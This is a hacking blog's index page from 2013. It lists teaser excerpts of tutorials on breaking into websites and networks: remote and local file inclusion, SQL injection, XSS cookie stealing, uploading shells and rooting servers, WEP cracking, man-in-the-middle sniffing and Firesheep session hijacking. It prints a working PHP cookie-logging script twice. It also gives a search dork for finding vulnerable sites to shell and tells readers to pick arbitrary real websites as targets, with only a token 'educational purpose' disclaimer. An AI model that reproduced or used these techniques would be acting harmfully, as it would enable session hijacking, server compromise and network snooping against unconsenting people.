Friday, 4 January 2013

Home

Hacking Website through Casper

Before you hack a system, you must decide what your goal is. Are you hacking to put the system down, gaining sensitive data, breaking into the system and taking the 'root' access, screwing up the system by formatting everything in it, discovering vulnerabilities & see how you can exploit them, etc ... ? The point is that you have to decide what the goal is first. 

Read More 

Hacking a Website - Exploiting Web Server

This method uses website vulnerability to hack it through PHP,Python,Perl,C++ exploits.
First of all you need a target website. (Google & find one)

Step1
Next thing you need to do is find out is, it online or offline. (Ping)
Go to http://www.just-ping.com & ping the target website.
Observe the results from ping. (Okay means online). 
 

Read More

  There are a number of ways to hack a website in this post we will be talking about RFI(remote file inclusion).

So let's start the talks.
Remote File Inclusion is the most common vulnerability found in many web servers. If the remote file execution is performed successfully, we can get control over the server and make it execute any command of our wish. So how exactly we can do that? 

Read More 

 

The List of Books is-

1-Hackers Underground Handbook
2-Hacking For Beginners
3-Hacking Crux
4-Hacking Secrets Revealed

 Read More 

How to steal Someone's Login Cookie Online

In this tutorial you'll learn how to steal someones login cookie.
Open notepad.
There type:
<?php
$cookie = $_GET['cookie'];
$log = fopen( log.txt , a );
fwrite($log, $cookie . \n );
fclose($log);
?> 

Read More

 

Next Page

 

Thursday, 3 January 2013

Posts Page 2

How to Steal Someone's Login Cookie Online

In this tutorial you'll learn how to steal someones login cookie.
Open notepad.
There type:
<?php
$cookie = $_GET['cookie'];
$log = fopen( log.txt , a );
fwrite($log, $cookie . \n );

Read More


How Hackers Route a Server 

Introduction:
For today's tutorial we shall learn how to exploit and root a webserver also gaining future access. The tutorial is most likely to be divided in three parts.
1) Gaining Admin Access.
2) Uploading The Shell
3) Using the Shell to Gain Root Access 

Read More

XSS Complete Tutorial 

Hi XSS is in 2 ways, Persistent and Non-Persistent type.
For XSS we will use something called a cookie catcher. Question will be that why we would need someone else's cookie?
The answer is that we can change our browser's cookies to login as them!!! So lets call it Session Hijacking 

Read More

Hacking With SQL Injection

In this tutorial i will describe how sql injection works and how to
use it to get some useful information.
First of all: What is SQL injection?
It's one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc...(in shortly). 

Read More

Hacking Website with LFI (Local File Inclusion) 

This tutorial will guide you into the process of exploiting a website thru the LFI (Local File Inclusion).
First lets take a look at a php code that is vulnerable to LFI:
Code:
<?php
$page = $_GET[page];
include($page);
?>  


How to upload Shell through XSS 

Hello and welcome back to Advanced XSS.Today I will be covering the XSS Shell.An XSS Shell gives the attacker full control over the victims
browser.The shell works inside an iframe environment.This allows the attacker to keep control of the victims browser even if the slave is
browsing to new pages etc...

Read More

Next Page

Posts Page 3


Basics Of Hacking

well well , every young hacker like to hack websites. But guys this is just for educational purpose only . Silenthackers or $2 will not take any responsibility for this thread.
ok
What is website hacking??
your answer --> To hack a website. 

Read More 

Shell a Website - Easy Way 

Today i will show u how to upload a shell in a website the EASIEST WAY ever!!!

Ok First open google.com

search this dork= inurl:/tabid/36/language/en-US/Default.aspx
ok choose a website that will look like this= http://www.thewebsite.com/Home/tabid...S/Default.aspx 

  Read More 

How to Crack Wifi Network's WEP password with Backtrack

WEP Is one of the unsecured encryption available so hackers mostly tries to break this is public environment and may be neighbor hoods Wifi signal.To crack WEP, you'll need to launch Konsole, BackTrack's built-in command line. It's right there on the task-bar in the lower left corner, second button to the right. Now, the commands.
First run the following to get a list of your network interfaces:
airmon-ng 

Read More

Man In the Middle Attack with Ettercap 

Only test this on your home network no where else. This guide is more of a reference for launching a man in the middle attack to view the traffic of victims on the network using ettercap along with sslstrip to strip out the important encrypted http traffic. I have done this on wired LANs using Backtrack. I have yet to get it to work wireless.  

Read More

Wifi Hacking With Firesheep 

In this tutorial i am going to show you how to to access someone's facebook, youtube, and many other accounts which is using the same WiFi as you.

You need:

1. Mozilla Firefox
2. Firesheep - A Firefox extension that demonstrates HTTP session hijacking attacks

Read More 

Hacking the Network - Easy Way

May be you tried lots of tips and tricks to perform a successful hack in a network but mostly failed but here it really worked for me a few times and I hope it does for you too, all you need is very a gullible target. 

Read More 

Sniffing in Backtrack 4 ARP Attack

Its not tough to Hijack / Capture / Sniff Wifi Traffic on almost any network as long as you are connected to it. Once you apply all the correct tricks, all future traffic for Wifi clients i.e. laptops, mobiles will be routed from your PC, giving you every bit of information about what others are doing on the network. 

Read More

 

Snow-Falling-Effect